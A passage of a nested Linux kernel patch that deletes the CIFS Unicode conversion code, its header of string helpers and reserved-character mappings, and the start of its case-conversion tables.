+-		 *   (4bytes UTF-16 code)
+-		 * 7-8bytes UTF-8(IVS) is charlen=3+4 or 4+4
+-		 *   (2 UTF-8 pairs divided to 2 UTF-16 pairs) */
+-		if (charlen == 4)
+-			i++;
+-		else if (charlen >= 5)
+-			/* 5-6bytes UTF-8 */
+-			i += 2;
+-	}
+-
+-	/* properly null-terminate string */
+-	for (i = 0; i < nullsize; i++)
+-		to[outlen++] = 0;
+-
+-	return outlen;
+-}
+-
+-/*
+- * NAME:	cifs_strtoUTF16()
+- *
+- * FUNCTION:	Convert character string to unicode string
+- *
+- */
+-int
+-cifs_strtoUTF16(__le16 *to, const char *from, int len,
+-	      const struct nls_table *codepage)
+-{
+-	int charlen;
+-	int i;
+-	wchar_t wchar_to; /* needed to quiet sparse */
+-
+-	/* special case for utf8 to handle no plane0 chars */
+-	if (!strcmp(codepage->charset, "utf8")) {
+-		/*
+-		 * convert utf8 -> utf16, we assume we have enough space
+-		 * as caller should have assumed conversion does not overflow
+-		 * in destination len is length in wchar_t units (16bits)
+-		 */
+-		i  = utf8s_to_utf16s(from, len, UTF16_LITTLE_ENDIAN,
+-				       (wchar_t *) to, len);
+-
+-		/* if success terminate and exit */
+-		if (i >= 0)
+-			goto success;
+-		/*
+-		 * if fails fall back to UCS encoding as this
+-		 * function should not return negative values
+-		 * currently can fail only if source contains
+-		 * invalid encoded characters
+-		 */
+-	}
+-
+-	for (i = 0; len && *from; i++, from += charlen, len -= charlen) {
+-		charlen = codepage->char2uni(from, len, &wchar_to);
+-		if (charlen < 1) {
+-			cifs_dbg(VFS, "strtoUTF16: char2uni of 0x%x returned %d\n",
+-				 *from, charlen);
+-			/* A question mark */
+-			wchar_to = 0x003f;
+-			charlen = 1;
+-		}
+-		put_unaligned_le16(wchar_to, &to[i]);
+-	}
+-
+-success:
+-	put_unaligned_le16(0, &to[i]);
+-	return i;
+-}
+-
+-/*
+- * cifs_utf16_bytes - how long will a string be after conversion?
+- * @utf16 - pointer to input string
+- * @maxbytes - don't go past this many bytes of input string
+- * @codepage - destination codepage
+- *
+- * Walk a utf16le string and return the number of bytes that the string will
+- * be after being converted to the given charset, not including any null
+- * termination required. Don't walk past maxbytes in the source buffer.
+- */
+-int
+-cifs_utf16_bytes(const __le16 *from, int maxbytes,
+-		const struct nls_table *codepage)
+-{
+-	int i;
+-	int charlen, outlen = 0;
+-	int maxwords = maxbytes / 2;
+-	char tmp[NLS_MAX_CHARSET_SIZE];
+-	__u16 ftmp[3];
+-
+-	for (i = 0; i < maxwords; i++) {
+-		ftmp[0] = get_unaligned_le16(&from[i]);
+-		if (ftmp[0] == 0)
+-			break;
+-		if (i + 1 < maxwords)
+-			ftmp[1] = get_unaligned_le16(&from[i + 1]);
+-		else
+-			ftmp[1] = 0;
+-		if (i + 2 < maxwords)
+-			ftmp[2] = get_unaligned_le16(&from[i + 2]);
+-		else
+-			ftmp[2] = 0;
+-
+-		charlen = cifs_mapchar(tmp, ftmp, codepage, NO_MAP_UNI_RSVD);
+-		outlen += charlen;
+-	}
+-
+-	return outlen;
+-}
+-
+-/*
+- * cifs_strndup_from_utf16 - copy a string from wire format to the local
+- * codepage
+- * @src - source string
+- * @maxlen - don't walk past this many bytes in the source string
+- * @is_unicode - is this a unicode string?
+- * @codepage - destination codepage
+- *
+- * Take a string given by the server, convert it to the local codepage and
+- * put it in a new buffer. Returns a pointer to the new string or NULL on
+- * error.
+- */
+-char *
+-cifs_strndup_from_utf16(const char *src, const int maxlen,
+-			const bool is_unicode, const struct nls_table *codepage)
+-{
+-	int len;
+-	char *dst;
+-
+-	if (is_unicode) {
+-		len = cifs_utf16_bytes((__le16 *) src, maxlen, codepage);
+-		len += nls_nullsize(codepage);
+-		dst = kmalloc(len, GFP_KERNEL);
+-		if (!dst)
+-			return NULL;
+-		cifs_from_utf16(dst, (__le16 *) src, len, maxlen, codepage,
+-				NO_MAP_UNI_RSVD);
+-	} else {
+-		dst = kstrndup(src, maxlen, GFP_KERNEL);
+-	}
+-
+-	return dst;
+-}
+-
+-static __le16 convert_to_sfu_char(char src_char)
+-{
+-	__le16 dest_char;
+-
+-	switch (src_char) {
+-	case ':':
+-		dest_char = cpu_to_le16(UNI_COLON);
+-		break;
+-	case '*':
+-		dest_char = cpu_to_le16(UNI_ASTERISK);
+-		break;
+-	case '?':
+-		dest_char = cpu_to_le16(UNI_QUESTION);
+-		break;
+-	case '<':
+-		dest_char = cpu_to_le16(UNI_LESSTHAN);
+-		break;
+-	case '>':
+-		dest_char = cpu_to_le16(UNI_GRTRTHAN);
+-		break;
+-	case '|':
+-		dest_char = cpu_to_le16(UNI_PIPE);
+-		break;
+-	default:
+-		dest_char = 0;
+-	}
+-
+-	return dest_char;
+-}
+-
+-static __le16 convert_to_sfm_char(char src_char, bool end_of_string)
+-{
+-	__le16 dest_char;
+-
+-	if (src_char >= 0x01 && src_char <= 0x1F) {
+-		dest_char = cpu_to_le16(src_char + 0xF000);
+-		return dest_char;
+-	}
+-	switch (src_char) {
+-	case ':':
+-		dest_char = cpu_to_le16(SFM_COLON);
+-		break;
+-	case '"':
+-		dest_char = cpu_to_le16(SFM_DOUBLEQUOTE);
+-		break;
+-	case '*':
+-		dest_char = cpu_to_le16(SFM_ASTERISK);
+-		break;
+-	case '?':
+-		dest_char = cpu_to_le16(SFM_QUESTION);
+-		break;
+-	case '<':
+-		dest_char = cpu_to_le16(SFM_LESSTHAN);
+-		break;
+-	case '>':
+-		dest_char = cpu_to_le16(SFM_GRTRTHAN);
+-		break;
+-	case '|':
+-		dest_char = cpu_to_le16(SFM_PIPE);
+-		break;
+-	case '.':
+-		if (end_of_string)
+-			dest_char = cpu_to_le16(SFM_PERIOD);
+-		else
+-			dest_char = 0;
+-		break;
+-	case ' ':
+-		if (end_of_string)
+-			dest_char = cpu_to_le16(SFM_SPACE);
+-		else
+-			dest_char = 0;
+-		break;
+-	default:
+-		dest_char = 0;
+-	}
+-
+-	return dest_char;
+-}
+-
+-/*
+- * Convert 16 bit Unicode pathname to wire format from string in current code
+- * page. Conversion may involve remapping up the six characters that are
+- * only legal in POSIX-like OS (if they are present in the string). Path
+- * names are little endian 16 bit Unicode on the wire
+- */
+-int
+-cifsConvertToUTF16(__le16 *target, const char *source, int srclen,
+-		 const struct nls_table *cp, int map_chars)
+-{
+-	int i, charlen;
+-	int j = 0;
+-	char src_char;
+-	__le16 dst_char;
+-	wchar_t tmp;
+-	wchar_t *wchar_to;	/* UTF-16 */
+-	int ret;
+-	unicode_t u;
+-
+-	if (map_chars == NO_MAP_UNI_RSVD)
+-		return cifs_strtoUTF16(target, source, PATH_MAX, cp);
+-
+-	wchar_to = kzalloc(6, GFP_KERNEL);
+-
+-	for (i = 0; i < srclen; j++) {
+-		src_char = source[i];
+-		charlen = 1;
+-
+-		/* check if end of string */
+-		if (src_char == 0)
+-			goto ctoUTF16_out;
+-
+-		/* see if we must remap this char */
+-		if (map_chars == SFU_MAP_UNI_RSVD)
+-			dst_char = convert_to_sfu_char(src_char);
+-		else if (map_chars == SFM_MAP_UNI_RSVD) {
+-			bool end_of_string;
+-
+-			/**
+-			 * Remap spaces and periods found at the end of every
+-			 * component of the path. The special cases of '.' and
+-			 * '..' do not need to be dealt with explicitly because
+-			 * they are addressed in namei.c:link_path_walk().
+-			 **/
+-			if ((i == srclen - 1) || (source[i+1] == '\\'))
+-				end_of_string = true;
+-			else
+-				end_of_string = false;
+-
+-			dst_char = convert_to_sfm_char(src_char, end_of_string);
+-		} else
+-			dst_char = 0;
+-		/*
+-		 * FIXME: We can not handle remapping backslash (UNI_SLASH)
+-		 * until all the calls to build_path_from_dentry are modified,
+-		 * as they use backslash as separator.
+-		 */
+-		if (dst_char == 0) {
+-			charlen = cp->char2uni(source + i, srclen - i, &tmp);
+-			dst_char = cpu_to_le16(tmp);
+-
+-			/*
+-			 * if no match, use question mark, which at least in
+-			 * some cases serves as wild card
+-			 */
+-			if (charlen > 0)
+-				goto ctoUTF16;
+-
+-			/* convert SURROGATE_PAIR */
+-			if (strcmp(cp->charset, "utf8") || !wchar_to)
+-				goto unknown;
+-			if (*(source + i) & 0x80) {
+-				charlen = utf8_to_utf32(source + i, 6, &u);
+-				if (charlen < 0)
+-					goto unknown;
+-			} else
+-				goto unknown;
+-			ret  = utf8s_to_utf16s(source + i, charlen,
+-					       UTF16_LITTLE_ENDIAN,
+-					       wchar_to, 6);
+-			if (ret < 0)
+-				goto unknown;
+-
+-			i += charlen;
+-			dst_char = cpu_to_le16(*wchar_to);
+-			if (charlen <= 3)
+-				/* 1-3bytes UTF-8 to 2bytes UTF-16 */
+-				put_unaligned(dst_char, &target[j]);
+-			else if (charlen == 4) {
+-				/* 4bytes UTF-8(surrogate pair) to 4bytes UTF-16
+-				 * 7-8bytes UTF-8(IVS) divided to 2 UTF-16
+-				 *   (charlen=3+4 or 4+4) */
+-				put_unaligned(dst_char, &target[j]);
+-				dst_char = cpu_to_le16(*(wchar_to + 1));
+-				j++;
+-				put_unaligned(dst_char, &target[j]);
+-			} else if (charlen >= 5) {
+-				/* 5-6bytes UTF-8 to 6bytes UTF-16 */
+-				put_unaligned(dst_char, &target[j]);
+-				dst_char = cpu_to_le16(*(wchar_to + 1));
+-				j++;
+-				put_unaligned(dst_char, &target[j]);
+-				dst_char = cpu_to_le16(*(wchar_to + 2));
+-				j++;
+-				put_unaligned(dst_char, &target[j]);
+-			}
+-			continue;
+-
+-unknown:
+-			dst_char = cpu_to_le16(0x003f);
+-			charlen = 1;
+-		}
+-
+-ctoUTF16:
+-		/*
+-		 * character may take more than one byte in the source string,
+-		 * but will take exactly two bytes in the target string
+-		 */
+-		i += charlen;
+-		put_unaligned(dst_char, &target[j]);
+-	}
+-
+-ctoUTF16_out:
+-	put_unaligned(0, &target[j]); /* Null terminate target unicode string */
+-	kfree(wchar_to);
+-	return j;
+-}
+-
+-/*
+- * cifs_local_to_utf16_bytes - how long will a string be after conversion?
+- * @from - pointer to input string
+- * @maxbytes - don't go past this many bytes of input string
+- * @codepage - source codepage
+- *
+- * Walk a string and return the number of bytes that the string will
+- * be after being converted to the given charset, not including any null
+- * termination required. Don't walk past maxbytes in the source buffer.
+- */
+-
+-static int
+-cifs_local_to_utf16_bytes(const char *from, int len,
+-			  const struct nls_table *codepage)
+-{
+-	int charlen;
+-	int i;
+-	wchar_t wchar_to;
+-
+-	for (i = 0; len && *from; i++, from += charlen, len -= charlen) {
+-		charlen = codepage->char2uni(from, len, &wchar_to);
+-		/* Failed conversion defaults to a question mark */
+-		if (charlen < 1)
+-			charlen = 1;
+-	}
+-	return 2 * i; /* UTF16 characters are two bytes */
+-}
+-
+-/*
+- * cifs_strndup_to_utf16 - copy a string to wire format from the local codepage
+- * @src - source string
+- * @maxlen - don't walk past this many bytes in the source string
+- * @utf16_len - the length of the allocated string in bytes (including null)
+- * @cp - source codepage
+- * @remap - map special chars
+- *
+- * Take a string convert it from the local codepage to UTF16 and
+- * put it in a new buffer. Returns a pointer to the new string or NULL on
+- * error.
+- */
+-__le16 *
+-cifs_strndup_to_utf16(const char *src, const int maxlen, int *utf16_len,
+-		      const struct nls_table *cp, int remap)
+-{
+-	int len;
+-	__le16 *dst;
+-
+-	len = cifs_local_to_utf16_bytes(src, maxlen, cp);
+-	len += 2; /* NULL */
+-	dst = kmalloc(len, GFP_KERNEL);
+-	if (!dst) {
+-		*utf16_len = 0;
+-		return NULL;
+-	}
+-	cifsConvertToUTF16(dst, src, strlen(src), cp, remap);
+-	*utf16_len = len;
+-	return dst;
+-}
+diff --git a/fs/cifs/cifs_unicode.h b/fs/cifs/cifs_unicode.h
+deleted file mode 100644
+index 80b3d845419fa..0000000000000
+--- a/fs/cifs/cifs_unicode.h
++++ /dev/null
+@@ -1,404 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- * cifs_unicode:  Unicode kernel case support
+- *
+- * Function:
+- *     Convert a unicode character to upper or lower case using
+- *     compressed tables.
+- *
+- *   Copyright (c) International Business Machines  Corp., 2000,2009
+- *
+- * Notes:
+- *     These APIs are based on the C library functions.  The semantics
+- *     should match the C functions but with expanded size operands.
+- *
+- *     The upper/lower functions are based on a table created by mkupr.
+- *     This is a compressed table of upper and lower case conversion.
+- */
+-#ifndef _CIFS_UNICODE_H
+-#define _CIFS_UNICODE_H
+-
+-#include <asm/byteorder.h>
+-#include <linux/types.h>
+-#include <linux/nls.h>
+-
+-#define  UNIUPR_NOLOWER		/* Example to not expand lower case tables */
+-
+-/*
+- * Windows maps these to the user defined 16 bit Unicode range since they are
+- * reserved symbols (along with \ and /), otherwise illegal to store
+- * in filenames in NTFS
+- */
+-#define UNI_ASTERISK    (__u16) ('*' + 0xF000)
+-#define UNI_QUESTION    (__u16) ('?' + 0xF000)
+-#define UNI_COLON       (__u16) (':' + 0xF000)
+-#define UNI_GRTRTHAN    (__u16) ('>' + 0xF000)
+-#define UNI_LESSTHAN    (__u16) ('<' + 0xF000)
+-#define UNI_PIPE        (__u16) ('|' + 0xF000)
+-#define UNI_SLASH       (__u16) ('\\' + 0xF000)
+-
+-/*
+- * Macs use an older "SFM" mapping of the symbols above. Fortunately it does
+- * not conflict (although almost does) with the mapping above.
+- */
+-
+-#define SFM_DOUBLEQUOTE ((__u16) 0xF020)
+-#define SFM_ASTERISK    ((__u16) 0xF021)
+-#define SFM_QUESTION    ((__u16) 0xF025)
+-#define SFM_COLON       ((__u16) 0xF022)
+-#define SFM_GRTRTHAN    ((__u16) 0xF024)
+-#define SFM_LESSTHAN    ((__u16) 0xF023)
+-#define SFM_PIPE        ((__u16) 0xF027)
+-#define SFM_SLASH       ((__u16) 0xF026)
+-#define SFM_SPACE	((__u16) 0xF028)
+-#define SFM_PERIOD	((__u16) 0xF029)
+-
+-/*
+- * Mapping mechanism to use when one of the seven reserved characters is
+- * encountered.  We can only map using one of the mechanisms at a time
+- * since otherwise readdir could return directory entries which we would
+- * not be able to open
+- *
+- * NO_MAP_UNI_RSVD  = do not perform any remapping of the character
+- * SFM_MAP_UNI_RSVD = map reserved characters using SFM scheme (MAC compatible)
+- * SFU_MAP_UNI_RSVD = map reserved characters ala SFU ("mapchars" option)
+- *
+- */
+-#define NO_MAP_UNI_RSVD		0
+-#define SFM_MAP_UNI_RSVD	1
+-#define SFU_MAP_UNI_RSVD	2
+-
+-/* Just define what we want from uniupr.h.  We don't want to define the tables
+- * in each source file.
+- */
+-#ifndef	UNICASERANGE_DEFINED
+-struct UniCaseRange {
+-	wchar_t start;
+-	wchar_t end;
+-	signed char *table;
+-};
+-#endif				/* UNICASERANGE_DEFINED */
+-
+-#ifndef UNIUPR_NOUPPER
+-extern signed char CifsUniUpperTable[512];
+-extern const struct UniCaseRange CifsUniUpperRange[];
+-#endif				/* UNIUPR_NOUPPER */
+-
+-#ifndef UNIUPR_NOLOWER
+-extern signed char CifsUniLowerTable[512];
+-extern const struct UniCaseRange CifsUniLowerRange[];
+-#endif				/* UNIUPR_NOLOWER */
+-
+-#ifdef __KERNEL__
+-int cifs_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
+-		    const struct nls_table *cp, int map_type);
+-int cifs_utf16_bytes(const __le16 *from, int maxbytes,
+-		     const struct nls_table *codepage);
+-int cifs_strtoUTF16(__le16 *, const char *, int, const struct nls_table *);
+-char *cifs_strndup_from_utf16(const char *src, const int maxlen,
+-			      const bool is_unicode,
+-			      const struct nls_table *codepage);
+-extern int cifsConvertToUTF16(__le16 *target, const char *source, int maxlen,
+-			      const struct nls_table *cp, int mapChars);
+-extern int cifs_remap(struct cifs_sb_info *cifs_sb);
+-extern __le16 *cifs_strndup_to_utf16(const char *src, const int maxlen,
+-				     int *utf16_len, const struct nls_table *cp,
+-				     int remap);
+-#endif
+-
+-wchar_t cifs_toupper(wchar_t in);
+-
+-/*
+- * UniStrcat:  Concatenate the second string to the first
+- *
+- * Returns:
+- *     Address of the first string
+- */
+-static inline __le16 *
+-UniStrcat(__le16 *ucs1, const __le16 *ucs2)
+-{
+-	__le16 *anchor = ucs1;	/* save a pointer to start of ucs1 */
+-
+-	while (*ucs1++) ;	/* To end of first string */
+-	ucs1--;			/* Return to the null */
+-	while ((*ucs1++ = *ucs2++)) ;	/* copy string 2 over */
+-	return anchor;
+-}
+-
+-/*
+- * UniStrchr:  Find a character in a string
+- *
+- * Returns:
+- *     Address of first occurrence of character in string
+- *     or NULL if the character is not in the string
+- */
+-static inline wchar_t *
+-UniStrchr(const wchar_t *ucs, wchar_t uc)
+-{
+-	while ((*ucs != uc) && *ucs)
+-		ucs++;
+-
+-	if (*ucs == uc)
+-		return (wchar_t *) ucs;
+-	return NULL;
+-}
+-
+-/*
+- * UniStrcmp:  Compare two strings
+- *
+- * Returns:
+- *     < 0:  First string is less than second
+- *     = 0:  Strings are equal
+- *     > 0:  First string is greater than second
+- */
+-static inline int
+-UniStrcmp(const wchar_t *ucs1, const wchar_t *ucs2)
+-{
+-	while ((*ucs1 == *ucs2) && *ucs1) {
+-		ucs1++;
+-		ucs2++;
+-	}
+-	return (int) *ucs1 - (int) *ucs2;
+-}
+-
+-/*
+- * UniStrcpy:  Copy a string
+- */
+-static inline wchar_t *
+-UniStrcpy(wchar_t *ucs1, const wchar_t *ucs2)
+-{
+-	wchar_t *anchor = ucs1;	/* save the start of result string */
+-
+-	while ((*ucs1++ = *ucs2++)) ;
+-	return anchor;
+-}
+-
+-/*
+- * UniStrlen:  Return the length of a string (in 16 bit Unicode chars not bytes)
+- */
+-static inline size_t
+-UniStrlen(const wchar_t *ucs1)
+-{
+-	int i = 0;
+-
+-	while (*ucs1++)
+-		i++;
+-	return i;
+-}
+-
+-/*
+- * UniStrnlen:  Return the length (in 16 bit Unicode chars not bytes) of a
+- *		string (length limited)
+- */
+-static inline size_t
+-UniStrnlen(const wchar_t *ucs1, int maxlen)
+-{
+-	int i = 0;
+-
+-	while (*ucs1++) {
+-		i++;
+-		if (i >= maxlen)
+-			break;
+-	}
+-	return i;
+-}
+-
+-/*
+- * UniStrncat:  Concatenate length limited string
+- */
+-static inline wchar_t *
+-UniStrncat(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	wchar_t *anchor = ucs1;	/* save pointer to string 1 */
+-
+-	while (*ucs1++) ;
+-	ucs1--;			/* point to null terminator of s1 */
+-	while (n-- && (*ucs1 = *ucs2)) {	/* copy s2 after s1 */
+-		ucs1++;
+-		ucs2++;
+-	}
+-	*ucs1 = 0;		/* Null terminate the result */
+-	return (anchor);
+-}
+-
+-/*
+- * UniStrncmp:  Compare length limited string
+- */
+-static inline int
+-UniStrncmp(const wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	if (!n)
+-		return 0;	/* Null strings are equal */
+-	while ((*ucs1 == *ucs2) && *ucs1 && --n) {
+-		ucs1++;
+-		ucs2++;
+-	}
+-	return (int) *ucs1 - (int) *ucs2;
+-}
+-
+-/*
+- * UniStrncmp_le:  Compare length limited string - native to little-endian
+- */
+-static inline int
+-UniStrncmp_le(const wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	if (!n)
+-		return 0;	/* Null strings are equal */
+-	while ((*ucs1 == __le16_to_cpu(*ucs2)) && *ucs1 && --n) {
+-		ucs1++;
+-		ucs2++;
+-	}
+-	return (int) *ucs1 - (int) __le16_to_cpu(*ucs2);
+-}
+-
+-/*
+- * UniStrncpy:  Copy length limited string with pad
+- */
+-static inline wchar_t *
+-UniStrncpy(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	wchar_t *anchor = ucs1;
+-
+-	while (n-- && *ucs2)	/* Copy the strings */
+-		*ucs1++ = *ucs2++;
+-
+-	n++;
+-	while (n--)		/* Pad with nulls */
+-		*ucs1++ = 0;
+-	return anchor;
+-}
+-
+-/*
+- * UniStrncpy_le:  Copy length limited string with pad to little-endian
+- */
+-static inline wchar_t *
+-UniStrncpy_le(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	wchar_t *anchor = ucs1;
+-
+-	while (n-- && *ucs2)	/* Copy the strings */
+-		*ucs1++ = __le16_to_cpu(*ucs2++);
+-
+-	n++;
+-	while (n--)		/* Pad with nulls */
+-		*ucs1++ = 0;
+-	return anchor;
+-}
+-
+-/*
+- * UniStrstr:  Find a string in a string
+- *
+- * Returns:
+- *     Address of first match found
+- *     NULL if no matching string is found
+- */
+-static inline wchar_t *
+-UniStrstr(const wchar_t *ucs1, const wchar_t *ucs2)
+-{
+-	const wchar_t *anchor1 = ucs1;
+-	const wchar_t *anchor2 = ucs2;
+-
+-	while (*ucs1) {
+-		if (*ucs1 == *ucs2) {
+-			/* Partial match found */
+-			ucs1++;
+-			ucs2++;
+-		} else {
+-			if (!*ucs2)	/* Match found */
+-				return (wchar_t *) anchor1;
+-			ucs1 = ++anchor1;	/* No match */
+-			ucs2 = anchor2;
+-		}
+-	}
+-
+-	if (!*ucs2)		/* Both end together */
+-		return (wchar_t *) anchor1;	/* Match found */
+-	return NULL;		/* No match */
+-}
+-
+-#ifndef UNIUPR_NOUPPER
+-/*
+- * UniToupper:  Convert a unicode character to upper case
+- */
+-static inline wchar_t
+-UniToupper(register wchar_t uc)
+-{
+-	register const struct UniCaseRange *rp;
+-
+-	if (uc < sizeof(CifsUniUpperTable)) {
+-		/* Latin characters */
+-		return uc + CifsUniUpperTable[uc];	/* Use base tables */
+-	} else {
+-		rp = CifsUniUpperRange;	/* Use range tables */
+-		while (rp->start) {
+-			if (uc < rp->start)	/* Before start of range */
+-				return uc;	/* Uppercase = input */
+-			if (uc <= rp->end)	/* In range */
+-				return uc + rp->table[uc - rp->start];
+-			rp++;	/* Try next range */
+-		}
+-	}
+-	return uc;		/* Past last range */
+-}
+-
+-/*
+- * UniStrupr:  Upper case a unicode string
+- */
+-static inline __le16 *
+-UniStrupr(register __le16 *upin)
+-{
+-	register __le16 *up;
+-
+-	up = upin;
+-	while (*up) {		/* For all characters */
+-		*up = cpu_to_le16(UniToupper(le16_to_cpu(*up)));
+-		up++;
+-	}
+-	return upin;		/* Return input pointer */
+-}
+-#endif				/* UNIUPR_NOUPPER */
+-
+-#ifndef UNIUPR_NOLOWER
+-/*
+- * UniTolower:  Convert a unicode character to lower case
+- */
+-static inline wchar_t
+-UniTolower(register wchar_t uc)
+-{
+-	register const struct UniCaseRange *rp;
+-
+-	if (uc < sizeof(CifsUniLowerTable)) {
+-		/* Latin characters */
+-		return uc + CifsUniLowerTable[uc];	/* Use base tables */
+-	} else {
+-		rp = CifsUniLowerRange;	/* Use range tables */
+-		while (rp->start) {
+-			if (uc < rp->start)	/* Before start of range */
+-				return uc;	/* Uppercase = input */
+-			if (uc <= rp->end)	/* In range */
+-				return uc + rp->table[uc - rp->start];
+-			rp++;	/* Try next range */
+-		}
+-	}
+-	return uc;		/* Past last range */
+-}
+-
+-/*
+- * UniStrlwr:  Lower case a unicode string
+- */
+-static inline wchar_t *
+-UniStrlwr(register wchar_t *upin)
+-{
+-	register wchar_t *up;
+-
+-	up = upin;
+-	while (*up) {		/* For all characters */
+-		*up = UniTolower(*up);
+-		up++;
+-	}
+-	return upin;		/* Return input pointer */
+-}
+-
+-#endif
+-
+-#endif /* _CIFS_UNICODE_H */
+diff --git a/fs/cifs/cifs_uniupr.h b/fs/cifs/cifs_uniupr.h
+deleted file mode 100644
+index 7b272fcdf0d3a..0000000000000
+--- a/fs/cifs/cifs_uniupr.h
++++ /dev/null
+@@ -1,239 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (c) International Business Machines  Corp., 2000,2002
+- *
+- * uniupr.h - Unicode compressed case ranges
+-*/
+-
+-#ifndef UNIUPR_NOUPPER
+-/*
+- * Latin upper case
+- */
+-signed char CifsUniUpperTable[512] = {
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 000-00f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 010-01f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 020-02f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 030-03f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 040-04f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 050-05f */
+-	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 060-06f */
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, 0, 0, 0, 0, 0,	/* 070-07f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 080-08f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 090-09f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0a0-0af */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0b0-0bf */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0c0-0cf */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0d0-0df */
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 0e0-0ef */
+-	-32, -32, -32, -32, -32, -32, -32, 0, -32, -32, -32, -32, -32, -32, -32, 121,	/* 0f0-0ff */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 100-10f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 110-11f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 120-12f */
+-	0, 0, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1, 0,	/* 130-13f */
+-	-1, 0, -1, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1,	/* 140-14f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 150-15f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 160-16f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1, 0,	/* 170-17f */
+-	0, 0, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, -1, 0, 0, 0,	/* 180-18f */
+-	0, 0, -1, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0,	/* 190-19f */
+-	0, -1, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, 0, -1, 0, 0,	/* 1a0-1af */
+-	-1, 0, 0, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, -1, 0, 0,	/* 1b0-1bf */
+-	0, 0, 0, 0, 0, -1, -2, 0, -1, -2, 0, -1, -2, 0, -1, 0,	/* 1c0-1cf */
+-	-1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, -79, 0, -1, /* 1d0-1df */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e0-1ef */
+-	0, 0, -1, -2, 0, -1, 0, 0, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1f0-1ff */
+-};
+-
+-/* Upper case range - Greek */
+-static signed char UniCaseRangeU03a0[47] = {
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -38, -37, -37, -37,	/* 3a0-3af */
+-	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 3b0-3bf */
+-	-32, -32, -31, -32, -32, -32, -32, -32, -32, -32, -32, -32, -64,
+-	-63, -63,
+-};
+-
+-/* Upper case range - Cyrillic */
+-static signed char UniCaseRangeU0430[48] = {
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 430-43f */
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 440-44f */
+-	0, -80, -80, -80, -80, -80, -80, -80, -80, -80, -80, -80, -80, 0, -80, -80,	/* 450-45f */
+-};
+-
+-/* Upper case range - Extended cyrillic */
+-static signed char UniCaseRangeU0490[61] = {
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 490-49f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 4a0-4af */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 4b0-4bf */
+-	0, 0, -1, 0, -1, 0, 0, 0, -1, 0, 0, 0, -1,
+-};
+-
+-/* Upper case range - Extended latin and greek */
+-static signed char UniCaseRangeU1e00[509] = {
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e00-1e0f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e10-1e1f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e20-1e2f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e30-1e3f */
